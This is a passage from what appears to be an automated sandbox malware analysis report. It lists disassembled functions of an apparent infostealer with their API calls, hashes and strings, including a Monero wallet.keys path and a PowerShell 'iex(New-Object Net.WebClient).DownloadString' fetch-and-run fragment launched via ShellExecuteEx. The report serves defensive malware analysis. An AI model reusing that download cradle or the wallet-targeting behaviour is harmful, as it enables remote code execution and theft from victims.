                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: a21ac8ec95813d9f342f3ab82b26fcd6f92a803de96ec73fc9f8ed3a6e0b7c0f
                                    • Instruction ID: 5e512e31aa1704307265657c0f5e1dd78756a94040fc7300248268f9690327f9
                                    • Opcode Fuzzy Hash: a21ac8ec95813d9f342f3ab82b26fcd6f92a803de96ec73fc9f8ed3a6e0b7c0f
                                    • Instruction Fuzzy Hash: ED01A2B5A44308BBD714EBE1EC49FADB7F8EF48701F104064FA15DB284DA7099409F50
                                    Function 00FB7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC3F0,00000000,00020119,00FB76B9), ref: 00FB775B
                                    • RegQueryValueExA.ADVAPI32(00FB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FB777A
                                    • RegCloseKey.ADVAPI32(00FB76B9), ref: 00FB7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: abcebfa7b30df13ef1228b0435e4656208e16e2cd85c33c5ea69c43308ca21f8
                                    • Instruction ID: 5f135b96d455cb389e4fd47cfc2ab376af2ca4a43ef2e71492d967268e09b850
                                    • Opcode Fuzzy Hash: abcebfa7b30df13ef1228b0435e4656208e16e2cd85c33c5ea69c43308ca21f8
                                    • Instruction Fuzzy Hash: D10144B5E40308BBDB14DBE0EC4AFAEB7B8EF44701F104168FA15AB285DA755541CF51
                                    Function 00FA99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                    • LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: b3b6a20659fed46eef22d82d3441b044428554ccc77982caea0d8c30710789ca
                                    • Instruction ID: 53495c6ae66149299e916ba0afc69e67b4488498e5b74ded6bad61b5c9a156f7
                                    • Opcode Fuzzy Hash: b3b6a20659fed46eef22d82d3441b044428554ccc77982caea0d8c30710789ca
                                    • Instruction Fuzzy Hash: E4311AB4E00209EFDB24CF94D885BAE77F5FF49310F108169E915AB290D778A981DFA0
                                    Function 00FB4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,008CE298), ref: 00FB47DB
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4801
                                    • lstrcat.KERNEL32(?,?), ref: 00FB4820
                                    • lstrcat.KERNEL32(?,?), ref: 00FB4834
                                    • lstrcat.KERNEL32(?,008BB958), ref: 00FB4847
                                    • lstrcat.KERNEL32(?,?), ref: 00FB485B
                                    • lstrcat.KERNEL32(?,008CDA80), ref: 00FB486F
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8D90: GetFileAttributesA.KERNEL32(00000000,?,00FA1B54,?,?,00FC564C,?,?,00FC0E1F), ref: 00FB8D9F
                                      • Part of subcall function 00FB4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FB4580
                                      • Part of subcall function 00FB4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FB4587
                                      • Part of subcall function 00FB4570: wsprintfA.USER32 ref: 00FB45A6
                                      • Part of subcall function 00FB4570: FindFirstFileA.KERNEL32(?,?), ref: 00FB45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 46411a5afb1e7a41b7a972c40419194012a6298d8d644afb2f3087909cd0101b
                                    • Instruction ID: 3ea9ef3a05f8ed086f97a5cdf852aa1abeef62961dbae1f3ee76420047f1a0d5
                                    • Opcode Fuzzy Hash: 46411a5afb1e7a41b7a972c40419194012a6298d8d644afb2f3087909cd0101b
                                    • Instruction Fuzzy Hash: 983173B690021867DB24F7F0DC85EE973BCAB48700F404599B31596081EE7897C9DF95
                                    Function 00FB2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB2D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FB2D04
                                    • <, xrefs: 00FB2D39
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FB2CC4
                                    • ')", xrefs: 00FB2CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: add408f62b8ad0cb646d75c514cb2477765c36237dbd05dfd85e1494f7e96bd4
                                    • Instruction ID: 5fb1f2638cbe59c0d03efa8ec98fa6fc889f6ed73f6a5f4359725616ad9edac9
                                    • Opcode Fuzzy Hash: add408f62b8ad0cb646d75c514cb2477765c36237dbd05dfd85e1494f7e96bd4
                                    • Instruction Fuzzy Hash: E4419071D10208EADB18EFA1DCA2FDDB778AF14300F504119E116B7591DF786A4AEF92
                                    Function 00FA9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FA9F41
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 632f54f45bf964beb9efa1fd76b42fecdfbc03b8baef61c8ec2488f19f9bdec0
                                    • Instruction ID: 2544fe42d78896955f3c0b7eaa57d0679ca8df58c72e984d08b4a6d8cca9f709
                                    • Opcode Fuzzy Hash: 632f54f45bf964beb9efa1fd76b42fecdfbc03b8baef61c8ec2488f19f9bdec0
                                    • Instruction Fuzzy Hash: 95613075A00248EFDB24EFA5CD96FED77B9AF45300F008418F9095B581EF78AA05DB52
                                    Function 00FB40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,008CDBE0,00000000,00020119,?), ref: 00FB40F4
                                    • RegQueryValueExA.ADVAPI32(?,008CE1C0,00000000,00000000,00000000,000000FF), ref: 00FB4118
                                    • RegCloseKey.ADVAPI32(?), ref: 00FB4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4147
                                    • lstrcat.KERNEL32(?,008CE3A0), ref: 00FB415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 28a473cef3a0fa433a7f984ca643b699bfa204466829582417da6f73d01d8db6
                                    • Instruction ID: 083c949805f055b8f88049d85d223cf5cb1ae77b36247bd6f0a65adb686fb745
                                    • Opcode Fuzzy Hash: 28a473cef3a0fa433a7f984ca643b699bfa204466829582417da6f73d01d8db6
                                    • Instruction Fuzzy Hash: 13418BB6D001086BDB28EBE0EC46FFD777DBB88300F044559B6265B185EA759BC88BD1
                                    Function 00FB6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00FB696C
                                    • sscanf.NTDLL ref: 00FB6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FB69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FB69C0
                                    • ExitProcess.KERNEL32 ref: 00FB69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 19472b6d636382ed16192807107c6ec4848c9ecbaa9f0b846088c41704f5ad14
                                    • Instruction ID: f61cd3c7cfff69a64d9a83a79c8e8cceb7b7db60a10d990c9ff1fb0370b04fbe
                                    • Opcode Fuzzy Hash: 19472b6d636382ed16192807107c6ec4848c9ecbaa9f0b846088c41704f5ad14
                                    • Instruction Fuzzy Hash: 2421EB75D00208ABCF18EFE4E9459EEB7F9FF48300F04852AE416E7244EB349648CB65
                                    Function 00FB7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,008BC460,00000000,00020119,?), ref: 00FB7E5E
                                    • RegQueryValueExA.ADVAPI32(?,008CDD20,00000000,00000000,000000FF,000000FF), ref: 00FB7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00FB7E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 4e9db22c1c4bd21b136671c78b88022f183bafe8c755f3721ce4441db26b2e35
                                    • Instruction ID: 22277289b6c71f9fd7c750f1a9d8da20e3c88c43c2f82cc601961010ab91bf5f
                                    • Opcode Fuzzy Hash: 4e9db22c1c4bd21b136671c78b88022f183bafe8c755f3721ce4441db26b2e35
                                    • Instruction Fuzzy Hash: 8911C1B2A44205EBD714DFC5E849FBBBBB8EF44B01F104129F612AB284D77498008FA1
                                    Function 00FB9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(008CDFF8,?,?,?,00FB140C,?,008CDFF8,00000000), ref: 00FB926C
                                    • lstrcpyn.KERNEL32(011EAB88,008CDFF8,008CDFF8,?,00FB140C,?,008CDFF8), ref: 00FB9290
                                    • lstrlen.KERNEL32(?,?,00FB140C,?,008CDFF8), ref: 00FB92A7
                                    • wsprintfA.USER32 ref: 00FB92C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: de7c60f1cfe3831629d4278b8059bc41ec479cdcaf2e1bcc11320acebaa024bc
                                    • Instruction ID: 30067f21d0c1a50fef6c87de7cc3f3b8ccc5f1e0eaa45571efcfee7a7ea7c107
                                    • Opcode Fuzzy Hash: de7c60f1cfe3831629d4278b8059bc41ec479cdcaf2e1bcc11320acebaa024bc
                                    • Instruction Fuzzy Hash: 9001CC75940108FFCB18DFECD988EAE7BB9EF48355F108548F9199B204C671AA80DB90
                                    Function 00FA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
